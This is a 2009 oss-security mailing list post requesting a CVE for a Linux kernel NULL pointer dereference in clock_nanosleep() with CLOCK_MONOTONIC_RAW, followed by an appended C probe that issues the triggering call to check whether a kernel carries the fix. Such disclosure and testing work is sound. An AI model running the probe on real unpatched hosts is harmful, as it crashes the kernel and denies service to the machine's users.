Date: Thu, 06 Aug 2009 13:39:05 +0800
From: Eugene Teo <eugene@...hat.com>
To: oss-security@...ts.openwall.com
CC: "Steven M. Christey" <coley@...us.mitre.org>
Subject: CVE request: kernel: clock_nanosleep() with CLOCK_MONOTONIC_RAW NULL pointer dereference
Calling do_nanosleep() with clockid CLOCK_MONOTONIC_RAW can cause a NULL
pointer dereference. Appears to be introduced after commit 2d42244a
(v2.6.28-rc1).
Upstream commit:
http://git.kernel.org/linus/70d715fd0597f18528f389b5ac59102263067744
Reproducer/backtrace:
http://lkml.org/lkml/2009/8/4/28
clock_nanosleep ->
  CLOCK_DISPATCH ->
    common_nsleep(arglist) ->
      hrtimer_nanosleep
        return hrtimer_nanosleep(tsave /* &ts */, rmtp /* NULL */,
                                 flags & TIMER_ABSTIME /* turns out false */ ?
                                 HRTIMER_MODE_ABS : HRTIMER_MODE_REL,
                                 which_clock); ->
        do_nanosleep ->
          hrtimer_start_expires ->
            hrtimer_start_range_ns ->
              __hrtimer_start_range_ns ->
                lock_hrtimer_base ->
                  ...
References:
http://lkml.org/lkml/2009/8/2/331
http://lkml.org/lkml/2009/8/4/40
https://bugzilla.redhat.com/show_bug.cgi?id=515867
Thanks, Eugene
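The following probe is an added example, not code from the post, the LKML report or the kernel tree. It issues the same user-space call the report describes, a relative clock_nanosleep() with rmtp == NULL on CLOCK_MONOTONIC_RAW, and compares the result with the same call on CLOCK_MONOTONIC. The upstream fix linked above makes the kernel refuse nanosleep on CLOCK_MONOTONIC_RAW with EOPNOTSUPP instead of reaching the NULL dereference; the function names probe_nanosleep() and verdict() are mine. Because a kernel that still has the bug would oops when the CLOCK_MONOTONIC_RAW call is made, run this only on a machine where that outcome is acceptable (a test VM), never on a production host you are trying to assess.

```c
/* Added example: probe whether this kernel refuses clock_nanosleep() on
 * CLOCK_MONOTONIC_RAW (the fixed behaviour) or accepts it.
 * Assumes Linux with glibc; clock_nanosleep() returns the error number
 * directly rather than -1 with errno set.
 * WARNING: on a kernel affected by the bug in the post above, the
 * CLOCK_MONOTONIC_RAW call triggers the NULL pointer dereference (kernel oops). */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <time.h>

/* Sleep 1 ms, relative mode, rmtp == NULL: the exact argument shape from the
 * report (flags & TIMER_ABSTIME is false, rmtp is NULL).
 * Returns 0 on success or the errno value clock_nanosleep() reports. */
static int probe_nanosleep(clockid_t clk)
{
    struct timespec req = { .tv_sec = 0, .tv_nsec = 1000000L }; /* 1 ms */
    int rc;

    do {
        rc = clock_nanosleep(clk, 0, &req, NULL);
    } while (rc == EINTR); /* rmtp is NULL, so simply redo the whole 1 ms */

    return rc;
}

/* Translate the return code into the verdict a tester wants to see. */
static const char *verdict(int rc)
{
    switch (rc) {
    case 0:
        return "accepted";      /* the clock supports nsleep and the sleep ran */
    case EOPNOTSUPP:            /* ENOTSUP has the same value on Linux */
        return "refused";       /* kernel carries the fix: nsleep not offered */
    case EINVAL:
        return "unknown-clock"; /* this kernel does not know the clockid */
    default:
        return "other-error";
    }
}

int main(void)
{
    int raw  = probe_nanosleep(CLOCK_MONOTONIC_RAW);
    int mono = probe_nanosleep(CLOCK_MONOTONIC);

    printf("CLOCK_MONOTONIC_RAW: rc=%d (%s) -> %s\n",
           raw, strerror(raw), verdict(raw));
    printf("CLOCK_MONOTONIC:     rc=%d (%s) -> %s\n",
           mono, strerror(mono), verdict(mono));
    return 0;
}
```

On a kernel with the fix the first line reports "refused" (EOPNOTSUPP) while the second reports "accepted"; the contrast shows that the rejection is specific to CLOCK_MONOTONIC_RAW rather than a general nanosleep failure. Any result that classifies as "other-error" deserves a closer look at that kernel's posix-timer code before drawing conclusions.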